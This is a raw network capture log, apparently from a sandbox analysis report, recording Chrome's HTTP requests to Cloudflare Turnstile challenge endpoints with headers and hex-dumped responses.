                                                                                                                                          2024-11-18 05:47:29 UTC168INHTTP/1.1 200 OK
                                                                                                                                          Content-Length: 0
                                                                                                                                          date: Mon, 18 Nov 2024 05:47:29 GMT
                                                                                                                                          Via: 1.1 google
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.1655137104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:29 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:29 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:29 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 7
                                                                                                                                          Connection: close
                                                                                                                                          cf-chl-out: j6kXpi00bKEXdABYdKnQPJ/KnPolAfJ9qN0=$4uU8MnOP/uTt+Jwo
                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa867ad945f4-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:29 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                          Data Ascii: invalid


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.1655138104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:29 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8e45aa726acf4857/1731908848539/e71f142feaf079649ccaf46b60025186ccfc7d9bc8d0652e628e1a0fa374fd37/GHRH_yeYijJgzEt HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:29 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:29 GMT
                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                          Content-Length: 1
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:29 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 35 78 38 55 4c 2d 72 77 65 57 53 63 79 76 52 72 59 41 4a 52 68 73 7a 38 66 5a 76 49 30 47 55 75 59 6f 34 61 44 36 4e 30 5f 54 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g5x8UL-rweWScyvRrYAJRhsz8fZvI0GUuYo4aD6N0_TcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                          2024-11-18 05:47:29 UTC1INData Raw: 4a
                                                                                                                                          Data Ascii: J


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.1655139104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:31 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8e45aa726acf4857/1731908848543/5Iv_qXWII0BR-3- HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:31 UTC200INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:31 GMT
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Content-Length: 61
                                                                                                                                          Connection: close
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa90ed052c91-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 62 00 00 00 5d 08 02 00 00 00 d1 eb 24 21 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                          Data Ascii: PNGIHDRb]$!IDAT$IENDB`


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.1655140104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:32 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8e45aa726acf4857/1731908848543/5Iv_qXWII0BR-3- HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:32 UTC200INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:32 GMT
                                                                                                                                          Content-Type: image/png
                                                                                                                                          Content-Length: 61
                                                                                                                                          Connection: close
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa95982345e7-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:32 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 62 00 00 00 5d 08 02 00 00 00 d1 eb 24 21 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                          Data Ascii: PNGIHDRb]$!IDAT$IENDB`


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.1655141104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:32 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 32125
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          CF-Challenge: UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:32 UTC16384OUTData Raw: 76 5f 38 65 34 35 61 61 37 32 36 61 63 66 34 38 35 37 3d 31 4e 77 33 74 4f 57 65 32 4b 32 6a 32 57 69 57 51 24 64 24 56 68 42 57 72 24 74 33 6b 33 57 42 65 57 73 24 51 35 53 66 24 69 4f 57 6d 24 73 66 55 30 57 53 56 31 24 41 66 77 68 65 46 57 78 55 30 24 62 52 33 24 31 33 42 69 24 6b 33 33 4f 35 24 57 30 66 57 25 32 62 24 6a 73 53 57 77 41 36 52 57 36 6e 4f 41 57 4f 64 48 24 52 75 32 32 6b 7a 2b 24 68 7a 59 5a 5a 32 32 62 6e 78 6a 24 58 7a 59 43 24 4b 77 51 24 44 54 51 48 33 45 30 24 31 32 48 48 54 77 75 24 4f 4e 24 68 36 32 24 34 54 56 48 48 67 43 4b 69 52 24 67 42 6b 58 43 70 52 24 35 48 34 42 75 4e 51 58 36 6b 24 62 58 39 57 6c 4f 66 33 24 51 36 33 24 4a 57 74 35 6a 45 52 66 24 73 32 53 75 48 47 34 4f 63 35 37 34 24 41 64 37 4d 7a 64 6b 5a 35 53 4d 57
                                                                                                                                          Data Ascii: v_8e45aa726acf4857=1Nw3tOWe2K2j2WiWQ$d$VhBWr$t3k3WBeWs$Q5Sf$iOWm$sfU0WSV1$AfwheFWxU0$bR3$13Bi$k33O5$W0fW%2b$jsSWwA6RW6nOAWOdH$Ru22kz+$hzYZZ22bnxj$XzYC$KwQ$DTQH3E0$12HHTwu$ON$h62$4TVHHgCKiR$gBkXCpR$5H4BuNQX6k$bX9WlOf3$Q63$JWt5jERf$s2SuHG4Oc574$Ad7MzdkZ5SMW
                                                                                                                                          2024-11-18 05:47:32 UTC15741OUTData Raw: 4f 78 6f 76 63 71 2b 69 52 24 33 4f 48 62 73 62 38 59 4b 52 24 24 2d 71 42 24 32 24 38 24 68 4a 62 4e 24 2b 33 24 33 71 72 24 65 4e 42 6e 57 79 77 36 48 77 32 4f 6f 50 6f 6f 30 4c 4f 33 57 70 24 4b 33 62 32 24 67 24 68 33 57 4e 24 56 57 46 2b 43 50 71 36 24 73 52 4f 54 24 4d 33 2b 50 4f 30 24 64 33 6a 66 24 42 24 2d 24 6a 65 57 70 24 71 75 57 77 62 35 24 79 33 4f 24 57 6a 24 41 59 38 32 62 51 24 67 24 31 72 62 58 24 4a 33 57 7a 62 55 33 37 33 62 7a 62 76 24 5a 33 4f 4e 62 54 24 2d 33 41 33 57 68 4e 69 4b 2b 6a 57 32 24 4b 33 57 24 57 66 57 4c 7a 31 24 62 6e 65 48 24 6a 33 57 68 33 76 24 55 33 4f 4a 24 64 33 55 70 4f 68 24 62 24 62 33 4f 32 57 68 74 4b 77 62 71 57 45 52 57 6d 57 6f 24 24 6a 74 52 4f 30 57 44 75 4a 52 58 71 24 4f 33 4a 7a 74 36 24 6e 33 62
                                                                                                                                          Data Ascii: Oxovcq+iR$3OHbsb8YKR$$-qB$2$8$hJbN$+3$3qr$eNBnWyw6Hw2OoPoo0LO3Wp$K3b2$g$h3WN$VWF+CPq6$sROT$M3+PO0$d3jf$B$-$jeWp$quWwb5$y3O$Wj$AY82bQ$g$1rbX$J3WzbU373bzbv$Z3ONbT$-3A3WhNiK+jW2$K3W$WfWLz1$bneH$j3Wh3v$U3OJ$d3UpOh$b$b3O2WhtKwbqWERWmWo$$jtRO0WDuJRXq$O3Jzt6$n3b
                                                                                                                                          2024-11-18 05:47:32 UTC330INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:32 GMT
                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                          Content-Length: 26360
                                                                                                                                          Connection: close
                                                                                                                                          cf-chl-gen: HkmeUwOxdX4FNyduryqtO3/T8qekWgGd/bqwFuz08x5kHRoWufQD6mECpGzJz/JJzsa1uvp14R5Terdy$l67kkZ0rMdi2zNaw
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa960babb78c-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:32 UTC1039INData Raw: 65 37 36 2f 77 70 66 48 6c 62 4f 5a 6c 59 69 76 6d 36 7a 47 77 61 6e 54 71 71 4b 68 6f 4a 47 6d 70 61 53 63 75 62 69 70 75 63 47 78 6e 63 44 48 76 37 48 47 74 62 75 32 76 63 4f 34 33 72 48 52 7a 4e 2b 76 39 72 58 6c 7a 4f 36 78 30 39 6a 34 76 72 61 37 7a 50 62 69 2f 4f 66 6c 31 75 62 79 35 67 7a 70 31 39 77 52 79 50 4c 6f 42 66 58 4e 79 65 6a 6b 2b 2f 4c 6b 2f 64 72 70 49 43 44 5a 33 50 4c 35 45 74 6b 54 4b 79 50 71 4b 52 76 6f 37 53 41 79 48 7a 55 50 46 69 51 44 45 69 51 4a 44 53 30 53 4c 41 31 42 44 68 49 4e 4f 42 4e 48 4f 67 67 55 4e 6b 6b 68 4a 52 6c 45 52 6b 4e 4a 45 54 51 6b 45 6b 45 75 4f 6b 63 31 4a 55 64 51 47 45 4a 55 54 46 56 46 4d 7a 64 44 57 31 30 35 53 43 56 48 51 46 35 4e 4b 6b 64 55 5a 46 5a 50 65 45 39 33 61 54 70 71 65 6a 46 41 64 7a 31
                                                                                                                                          Data Ascii: e76/wpfHlbOZlYivm6zGwanTqqKhoJGmpaScubipucGxncDHv7HGtbu2vcO43rHRzN+v9rXlzO6x09j4vra7zPbi/Ofl1uby5gzp19wRyPLoBfXNyejk+/Lk/drpICDZ3PL5EtkTKyPqKRvo7SAyHzUPFiQDEiQJDS0SLA1BDhINOBNHOggUNkkhJRlERkNJETQkEkEuOkc1JUdQGEJUTFVFMzdDW105SCVHQF5NKkdUZFZPeE93aTpqejFAdz1
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 2b 30 35 76 47 72 61 44 57 74 4b 36 6e 70 4a 4c 49 73 37 72 67 77 64 32 75 73 4b 4b 38 6e 74 66 70 33 4c 6e 61 7a 4d 7a 4e 72 65 79 76 79 63 2f 41 72 4c 62 75 38 4f 4c 76 78 4f 72 66 32 72 7a 67 39 64 4c 66 42 77 50 35 43 63 50 57 41 4e 72 6f 32 4f 2f 50 33 75 41 42 78 76 50 2b 42 4d 72 6f 31 67 30 4e 47 68 38 62 2f 69 49 41 33 42 7a 38 41 39 37 67 49 52 58 2b 47 65 4d 69 4a 78 73 78 41 69 48 76 4c 44 63 70 44 41 4d 44 4e 69 33 33 39 43 45 68 50 2f 67 4e 52 52 6b 43 4f 53 45 68 52 30 6b 2f 52 30 4d 51 4c 77 67 78 45 44 52 51 4a 52 41 31 56 52 52 62 4f 6c 5a 53 4f 6c 4d 73 58 46 64 6d 4f 6d 5a 6c 50 30 4e 58 52 79 56 67 54 6d 6f 76 51 54 42 66 5a 30 74 52 64 6a 64 69 5a 58 31 30 63 7a 70 4f 62 33 68 66 57 30 31 33 59 6f 68 56 5a 58 77 2b 68 33 5a 39 55 49
                                                                                                                                          Data Ascii: +05vGraDWtK6npJLIs7rgwd2usKK8ntfp3LnazMzNreyvyc/ArLbu8OLvxOrf2rzg9dLfBwP5CcPWANro2O/P3uABxvP+BMro1g0NGh8b/iIA3Bz8A97gIRX+GeMiJxsxAiHvLDcpDAMDNi339CEhP/gNRRkCOSEhR0k/R0MQLwgxEDRQJRA1VRRbOlZSOlMsXFdmOmZlP0NXRyVgTmovQTBfZ0tRdjdiZX10czpOb3hfW013YohVZXw+h3Z9UI
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 31 61 58 54 77 38 2b 64 32 72 48 63 32 74 2f 62 34 4e 4f 37 34 2b 44 6a 71 64 54 4d 76 38 37 74 72 74 72 63 38 39 58 49 37 74 54 6d 78 38 54 76 31 38 66 76 39 65 7a 56 39 50 72 61 34 77 44 6f 34 66 48 6b 2f 76 30 44 44 2b 33 67 45 2f 50 51 78 76 48 76 47 50 48 78 36 68 58 70 32 75 7a 74 37 4e 6a 35 37 67 37 32 2b 64 30 52 38 77 67 48 49 67 33 71 34 65 37 77 37 77 6f 71 4d 4f 67 78 39 2f 41 4f 4e 77 55 47 2f 53 30 55 2f 50 67 37 51 52 76 2b 46 68 30 70 2f 44 5a 4f 4a 77 63 6b 42 79 49 52 45 78 4d 6c 4e 55 70 58 4e 6c 46 59 57 7a 41 34 4f 31 51 76 4f 31 52 67 4d 55 41 79 51 6a 64 43 4e 6c 38 6f 58 6b 63 2f 54 31 30 74 51 6d 5a 54 56 55 5a 6b 56 31 70 61 54 6c 78 77 57 6d 75 42 4f 31 56 46 5a 46 78 6b 52 59 70 74 56 57 6c 77 54 48 6c 68 61 47 39 6e 69 6d 42
                                                                                                                                          Data Ascii: 1aXTw8+d2rHc2t/b4NO74+DjqdTMv87trtrc89XI7tTmx8Tv18fv9ezV9Pra4wDo4fHk/v0DD+3gE/PQxvHvGPHx6hXp2uzt7Nj57g72+d0R8wgHIg3q4e7w7woqMOgx9/AONwUG/S0U/Pg7QRv+Fh0p/DZOJwckByIRExMlNUpXNlFYWzA4O1QvO1RgMUAyQjdCNl8oXkc/T10tQmZTVUZkV1paTlxwWmuBO1VFZFxkRYptVWlwTHlhaG9nimB
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 4b 2b 59 7a 64 2f 61 6e 73 47 2b 31 72 61 6f 30 71 6e 67 71 73 57 37 32 50 48 68 76 4b 37 74 77 63 62 53 36 62 4c 4e 39 2b 57 34 30 39 48 62 30 39 4c 34 31 77 44 63 30 41 51 43 36 65 4c 57 2f 75 7a 49 79 2b 48 68 33 75 73 53 41 74 67 55 45 67 58 6d 47 52 72 78 48 53 49 69 44 42 72 69 47 75 48 35 46 41 63 67 41 67 59 4e 35 78 77 63 45 75 73 47 4a 2f 50 70 44 43 49 57 44 78 6f 74 48 69 73 37 4e 69 51 50 49 30 55 77 42 78 30 66 4c 43 63 2f 4c 52 67 4d 51 30 77 78 45 6c 41 6c 45 79 4a 42 4d 43 6b 31 4b 53 39 63 54 45 45 31 55 43 4e 5a 56 6a 4a 47 4d 6c 6b 6e 48 6b 52 4d 4f 46 30 70 63 6b 70 63 4c 32 56 50 4f 48 4e 53 56 6a 5a 77 4d 46 64 49 62 56 61 44 58 47 4a 75 56 48 6c 65 52 57 47 4c 58 49 4b 49 5a 48 35 77 59 49 46 78 6a 6f 56 55 65 49 35 37 55 34 32 47
                                                                                                                                          Data Ascii: K+Yzd/ansG+1rao0qngqsW72PHhvK7twcbS6bLN9+W409Hb09L41wDc0AQC6eLW/uzIy+Hh3usSAtgUEgXmGRrxHSIiDBriGuH5FAcgAgYN5xwcEusGJ/PpDCIWDxotHis7NiQPI0UwBx0fLCc/LRgMQ0wxElAlEyJBMCk1KS9cTEE1UCNZVjJGMlknHkRMOF0pckpcL2VPOHNSVjZwMFdIbVaDXGJuVHleRWGLXIKIZH5wYIFxjoVUeI57U42G
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 6a 68 75 62 36 38 33 71 4b 69 71 75 62 59 35 2b 4c 73 36 38 37 48 30 62 53 79 30 39 71 36 33 66 72 7a 39 2b 6e 4c 2b 38 4c 65 42 50 37 78 34 76 34 46 79 50 7a 46 43 4d 77 4f 2f 75 7a 75 42 77 34 42 45 4f 6f 61 46 4f 33 57 36 67 73 59 33 52 72 77 2f 52 54 32 48 52 55 52 38 75 6a 33 49 65 67 65 4b 50 6b 64 43 65 77 51 45 2f 45 71 45 69 50 30 43 44 49 5a 46 54 37 33 4d 2f 6f 2f 48 7a 30 66 4d 53 55 6d 43 77 4d 2b 48 77 39 4f 4d 43 63 4c 4b 45 5a 4e 44 6c 59 73 54 78 56 48 53 79 67 66 4e 6b 42 68 4b 78 5a 4f 59 6d 68 54 4e 45 6f 6c 57 47 34 71 49 55 59 6e 53 53 56 66 5a 6e 63 76 54 30 78 4b 4f 48 6c 59 57 6a 64 36 67 6a 73 38 66 6e 70 59 69 48 4e 59 59 6b 74 4c 53 32 6c 4c 66 5a 4b 54 6c 45 5a 73 63 55 6c 75 54 31 64 62 55 6f 39 70 58 5a 79 53 64 36 4f 67 70
                                                                                                                                          Data Ascii: jhub683qKiqubY5+Ls687H0bSy09q63frz9+nL+8LeBP7x4v4FyPzFCMwO/uzuBw4BEOoaFO3W6gsY3Rrw/RT2HRUR8uj3IegeKPkdCewQE/EqEiP0CDIZFT73M/o/Hz0fMSUmCwM+Hw9OMCcLKEZNDlYsTxVHSygfNkBhKxZOYmhTNEolWG4qIUYnSSVfZncvT0xKOHlYWjd6gjs8fnpYiHNYYktLS2lLfZKTlEZscUluT1dbUo9pXZySd6Ogp
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 55 79 4f 54 4f 36 39 48 51 35 74 48 4c 7a 37 4b 30 78 39 6a 74 76 4e 62 6d 74 39 6e 57 34 50 63 41 33 4f 44 54 2f 4f 58 72 33 4f 72 39 41 75 44 4a 2b 51 62 51 33 51 67 47 44 67 45 43 45 4f 77 4e 45 42 51 55 2b 67 38 41 47 2f 6f 56 45 39 38 59 45 67 67 49 36 50 77 67 49 68 49 61 44 75 73 43 4c 78 51 45 38 43 49 6a 38 76 77 4f 47 53 45 62 4c 54 6f 6c 50 52 77 36 50 7a 51 34 4c 42 30 4b 4f 6b 4a 48 4c 30 4a 47 49 54 30 78 54 54 64 55 4f 6a 6c 50 4f 6a 51 34 47 78 30 77 51 56 59 6c 50 30 38 67 51 6a 39 4a 59 47 68 46 53 54 78 6c 54 6c 52 46 4d 6d 4a 73 57 58 42 6f 62 33 4e 31 58 6e 4a 68 53 6d 42 31 51 56 4a 45 5a 56 57 41 5a 32 5a 2b 65 57 52 6f 67 34 68 70 62 33 4b 51 63 6e 4a 31 6b 4a 4e 32 55 34 78 76 6b 6e 46 61 69 70 70 79 62 70 69 63 6e 32 61 49 6e 4b
                                                                                                                                          Data Ascii: UyOTO69HQ5tHLz7K0x9jtvNbmt9nW4PcA3ODT/OXr3Or9AuDJ+QbQ3QgGDgECEOwNEBQU+g8AG/oVE98YEggI6PwgIhIaDusCLxQE8CIj8vwOGSEbLTolPRw6PzQ4LB0KOkJHL0JGIT0xTTdUOjlPOjQ4Gx0wQVYlP08gQj9JYGhFSTxlTlRFMmJsWXBob3N1XnJhSmB1QVJEZVWAZ2Z+eWRog4hpb3KQcnJ1kJN2U4xvknFaippybpicn2aInK
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 73 4e 4c 54 36 39 2f 53 34 65 37 7a 32 75 6a 77 30 4c 6e 66 2b 65 54 34 38 50 33 59 42 65 67 41 33 41 33 6c 42 50 66 75 42 41 59 4c 2f 50 4d 4d 2b 42 6e 36 45 50 7a 6d 42 68 51 42 44 51 45 59 39 42 30 45 47 2b 4d 64 46 42 33 38 4a 51 34 6a 45 52 6b 6c 4a 78 55 64 49 43 76 7a 4a 52 49 76 4d 79 6b 6e 4e 42 45 78 4e 44 63 73 49 79 34 38 4b 52 4d 79 51 68 31 46 4f 45 4d 4d 55 54 70 48 4a 51 35 42 53 53 6c 56 51 6b 39 45 4f 7a 31 54 48 47 46 55 57 44 56 6c 50 6c 73 6b 5a 55 70 66 54 56 6c 4d 59 30 46 64 55 57 68 56 50 31 39 72 57 54 4a 59 63 45 31 6c 58 33 5a 52 4f 6d 46 31 56 59 46 6b 66 46 6d 4a 63 33 39 74 68 59 43 45 59 59 46 71 68 32 57 56 69 59 74 70 6a 58 6d 51 68 48 75 49 6c 6f 46 72 69 70 5a 67 6d 59 61 62 6e 36 57 54 6e 33 32 64 68 71 4f 42 72 5a 79
                                                                                                                                          Data Ascii: sNLT69/S4e7z2ujw0Lnf+eT48P3YBegA3A3lBPfuBAYL/PMM+Bn6EPzmBhQBDQEY9B0EG+MdFB38JQ4jERklJxUdICvzJRIvMyknNBExNDcsIy48KRMyQh1FOEMMUTpHJQ5BSSlVQk9EOz1THGFUWDVlPlskZUpfTVlMY0FdUWhVP19rWTJYcE1lX3ZROmF1VYFkfFmJc39thYCEYYFqh2WViYtpjXmQhHuIloFripZgmYabn6WTn32dhqOBrZy
                                                                                                                                          2024-11-18 05:47:32 UTC1369INData Raw: 4f 6e 75 75 50 37 78 34 4d 6e 35 38 4c 7a 73 7a 76 6e 6f 30 51 44 34 78 50 54 57 41 76 44 5a 44 67 6e 78 41 65 30 41 45 4f 55 44 44 75 6e 5a 39 52 4d 58 2f 64 4d 42 33 2f 30 69 47 66 6a 68 45 78 34 4c 36 42 63 69 2f 65 30 4b 4a 79 73 74 45 79 6b 48 4f 53 6b 5a 4d 78 59 36 4d 51 38 62 45 43 34 6a 41 69 49 79 4b 43 6f 2f 4f 45 41 35 48 44 6f 68 4c 79 39 46 49 68 4a 46 51 54 6b 69 57 56 45 37 4a 7a 5a 4a 4d 69 35 6a 56 54 4d 37 56 55 56 66 51 6d 70 64 4f 68 39 4c 59 54 39 44 59 56 35 56 50 69 35 74 56 31 4e 53 5a 6b 35 4b 63 33 46 4f 62 58 46 68 65 31 36 44 65 56 65 4a 5a 32 74 71 69 56 6d 45 59 46 2b 42 63 59 74 75 69 34 6c 6d 6c 57 57 51 62 47 74 37 6b 57 36 64 62 5a 69 45 63 35 57 46 6e 34 4a 68 6e 58 71 70 65 61 53 51 66 34 2b 6c 67 72 47 42 71 36 36 48
